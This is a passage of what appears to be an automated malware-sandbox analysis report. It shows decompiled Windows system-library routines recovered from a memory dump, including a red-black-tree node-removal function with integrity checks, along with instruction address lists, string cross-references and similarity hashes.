				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0389DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0389DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0389D130(_t34, _t39, _t40);
			}

0x038f8df1
0x038f8df1
0x038f8df1
0x038f8df1
0x038f8df1
0x038f8df1
0x038f8df3
0x038f8df8
0x038f8dfd
0x038f8e00
0x038f8e0e
0x038f8e2a
0x038f8e36
0x038f8e38
0x038f8e3c
0x038f8e46
0x038f8e46
0x038f8e36
0x038f8e50
0x038f8e56
0x038f8e59
0x038f8e5c
0x038f8e60
0x038f8e67
0x038f8e6d
0x038f8e73
0x038f8e74
0x038f8eb1
0x038f8ebd

Strings

Critical error detected %lx, xrefs: 038F8E21

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 9c3a8ce18c912d280846b3d390e6ff03edfec786821a95e2a9310f5471570b21
Instruction ID: 8eed468022f53e52b9dd5c028c4d9c1e2c20c8eb58342455e0851195787f4f8c
Opcode Fuzzy Hash: 9c3a8ce18c912d280846b3d390e6ff03edfec786821a95e2a9310f5471570b21
Instruction Fuzzy Hash: A4113979D55348DEDF24CFE8850579CBBB0AB04318F28429ED529AB392C3344606CF16

Uniqueness

Uniqueness Score: -1.00%

Function 038DFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 038DFF60

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 878cc3e1e2ea65296c8f251206864b7b8a77ef727bf90ed6a223473a8a305b94
Instruction ID: 9a698b62e02c439b3cf61bb994dc237ed6e24da47c54f7a968304e4a22ad3b4d
Opcode Fuzzy Hash: 878cc3e1e2ea65296c8f251206864b7b8a77ef727bf90ed6a223473a8a305b94
Instruction Fuzzy Hash: AA11E1B6510244EFDF11EF94C949F9CB7B1BB09704F1880C4E209AF261CB389944DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0384F900, Relevance: .9, Instructions: 863
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0384F900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}

0x0384f90b
0x0384f911
0x0384f917
0x0384f919
0x0384f91c
0x038a5d63
0x038a5d69
0x038a5d69
0x038a5d63
0x0384f922
0x0384f927
0x038a5d72
0x038a5d78
0x038a5d78
0x038a5d72
0x0384f92d
0x0384f931
0x0384fa2d
0x0384fa2d
0x0384f939
0x0384f940
0x0384f944
0x0384fa37
0x0384fa39
0x0384fa3c
0x0384fa3e
0x0384fa41
0x0384fa48
0x0384fe68
0x0384fe6c
0x0384fe6c
0x0384fe78
0x0384fe78
0x0384fe7a
0x0384fe7a
0x0384fe7e
0x0384fe6e
0x0384fe6e
0x0384fe72
0x00000000
0x00000000
0x00000000
0x0384fe80
0x0384fe80
0x0384fe83
0x00000000
0x0384fe83
0x038a5d7f
0x038a5d81
0x00000000
0x00000000
0x038a5d87
0x00000000
0x038a5d87
0x0384fa4e
0x0384fa50
0x038a5d90
0x00000000
0x00000000
0x038a5d98
0x0384fa58
0x0384fa58
0x0384fa5d
0x0384fa60
0x0384fa63
0x0384fa69
0x0384fa6b
0x0384fa6e
0x0384fa71
0x038a5da1
0x038a5da7
0x038a5da7
0x038a5da1
0x0384fa79
0x03850071
0x03850073
0x03850074
0x00000000
0x0384fa7f
0x0384fa83
0x0384fa85
0x038a5dae
0x038a5dae
0x0384fa8b
0x0384fa8f
0x0384fa98
0x0384faa1
0x0384faa4
0x0384faa6
0x0384faa9
0x0384faac
0x038a5db7
0x038a5dbd
0x038a5dbd
0x038a5db7
0x0384fab4
0x00000000
0x0384faba
0x0384fabc
0x0384fac2
0x0384fac5
0x0384fac7
0x0384fac7
0x0384fad6
0x0384fad9
0x0384fadf
0x0384fae2
0x0384fae4
0x0384fae7
0x0384faea
0x0384faed
0x038a5dc4
0x038a5dc9
0x00000000
0x00000000
0x038a5dcf
0x0384faf6
0x0384fafa
0x0384fafc
0x0384fafc
0x0384fafe
0x0384fb01
0x0384fb09
0x0384fb0c
0x0384fb12
0x0384fb14
0x0384fb17
0x038a5dd6
0x038a5dd9
0x038a5dde
0x00000000
0x00000000
0x038a5de4
0x038a5de7
0x0384fb29
0x0384fb2c
0x038a5df3
0x038a5df6
0x038a5e06
0x038a5e0c
0x038a5e0f
0x038a5e11
0x00000000
0x038a5e1f
0x00000000
0x038a5e1f
0x038a5e11
0x038a5df8
0x038a5dfb
0x038a5e00
0x00000000
0x00000000
0x038a5e02
0x00000000
0x038a5e02
0x0384fb32
0x0384fb35
0x0384fb3c
0x038a5e26
0x038a5e28
0x038a5e28
0x038a5e2e
0x038a5e3c
0x038a5e3c
0x038a5e2e
0x0384fb45
0x0384fb47
0x0384fb53
0x0384fb56
0x0384fb59
0x0384fb5c
0x0384fb65
0x0385000d
0x00000000
0x0385000f
0x0385000f
0x00000000
0x0385000f
0x0384fb6b
0x0384fb6e
0x0384fb71
0x0384fb73
0x0384fb76
0x038a5e45
0x038a5e4b
0x038a5e4b
0x038a5e45
0x0384fb80
0x0384fb83
0x038a5e54
0x038a5e5a
0x038a5e5a
0x038a5e54
0x0384fb89
0x0384fb98
0x0384fb9b
0x0384fb9e
0x0384fba0
0x038a5e63
0x038a5e69
0x038a5e69
0x038a5e63
0x0384fba8
0x00000000
0x0384fbae
0x0384fbb2
0x038a5e70
0x0384fbb8
0x0384fbb8
0x0384fbb8
0x0384fbbd
0x0384fbbf
0x0384fbbf
0x0384f9a8
0x0384f9a8
0x0384f9ad
0x0384f9b4
0x038a5eda
0x00000000
0x00000000
0x038a5ee2
0x0384f9bc
0x0384f9bc
0x0384f9bf
0x0384f9c4
0x0384fde6
0x0384fde9
0x0384fdec
0x0384fdef
0x0384fdf2
0x038a5eeb
0x038a5ef1
0x038a5ef1
0x038a5eeb
0x0384fdfa
0x00000000
0x0384fe00
0x0384fe04
0x038a5efa
0x038a5f00
0x038a5f00
0x038a5efa
0x0384fe0a
0x0384fa24
0x0384fa2a
0x0384fa2a
0x0384fdfa
0x0384f9cd
0x00000000
0x0384f9cf
0x0384f9cf
0x0384f9d1
0x0384f9d4
0x0384f9d7
0x0384f9d9
0x0384f9dc
0x0384f9df
0x0384f9e2
0x0384f9e7
0x038a5f09
0x00000000
0x00000000
0x038a5f11
0x0384f9ef
0x0384f9f3
0x0384fed5
0x0384fed8
0x0384fedb
0x038a5f1a
0x038a5f20
0x038a5f20
0x038a5f1a
0x0384fee3
0x00000000
0x0384fee9
0x0384feeb
0x038a5f29
0x038a5f2f
0x038a5f2f
0x038a5f29
0x0384fef3
0x00000000
0x0384fef9
0x0384fefc
0x0384ff01
0x038a5f38
0x03850052
0x03850054
0x00000000
0x03850056
0x03850056
0x0384ff40
0x0384ff42
0x038a5f6e
0x038a5f74
0x038a5f74
0x038a5f6e
0x0384ff50
0x0384ff56
0x0384ff5b
0x038a5f7d
0x00000000
0x00000000
0x038a5f83
0x00000000
0x0384ff61
0x0384ff61
0x0384ff63
0x03850021
0x03850026
0x0385002b
0x0385007e
0x03850080
0x03850080
0x0385007e
0x0385002f
0x00000000
0x03850031
0x03850033
0x03850086
0x03850035
0x03850035
0x03850035
0x0385003c
0x00000000
0x0385003c
0x0385002f
